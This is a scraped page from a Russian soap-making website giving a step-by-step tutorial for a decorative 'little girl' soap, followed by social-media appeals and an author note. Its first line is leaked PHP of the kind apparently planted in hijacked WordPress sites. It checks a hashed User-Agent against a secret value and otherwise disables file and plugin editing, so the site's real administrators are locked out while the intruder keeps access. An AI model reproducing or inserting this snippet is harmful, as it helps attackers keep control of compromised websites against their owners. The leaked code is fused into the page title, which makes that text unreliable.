if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыло “Маленькая девочка” — сплошная милость! Попробуйте сделать такое! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыло “Маленькая девочка” — сплошная милость! Попробуйте сделать такое!

Такая прелестная девчушка порадует своего обладателя! И сделать ее совсем несложно!

Что­бы сде­лать такое мыло в домаш­них усло­ви­ях пона­до­бят­ся: про­зрач­ная осно­ва, любое мас­ло, кра­си­те­ли для мыла, отдуш­ка (какая по душе), шпаж­ка и посу­да для плав­ле­ния мыла.

Пер­вое, что нуж­но сде­лать – это рас­пла­вить осно­ву и доба­вить туда зеле­ный или бирю­зо­вый кра­си­тель. Гото­вую осно­ву залить в фор­му так, что­бы окра­си­лись кон­тур, пла­тье и шляп­ка. Лиш­нее мож­но убрать при помо­щи шпаж­ки. Сме­шать диок­сид тита­на с мас­лом, доба­вить капель­ку корич­не­во­го кра­си­те­ля и пере­ме­шать. Полу­чит­ся телес­ный отте­нок. Этой сме­сью залить лицо, нож­ки и руч­ки. Затем сме­шать про­зрач­ную осно­ву с жел­тым и жем­чуж­ным кра­си­те­ля­ми. Запол­нить остав­ший­ся фон этим сло­ем. Осту­дить мыло и отпра­вить в морозилку.

дев2

дев3

дев4


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!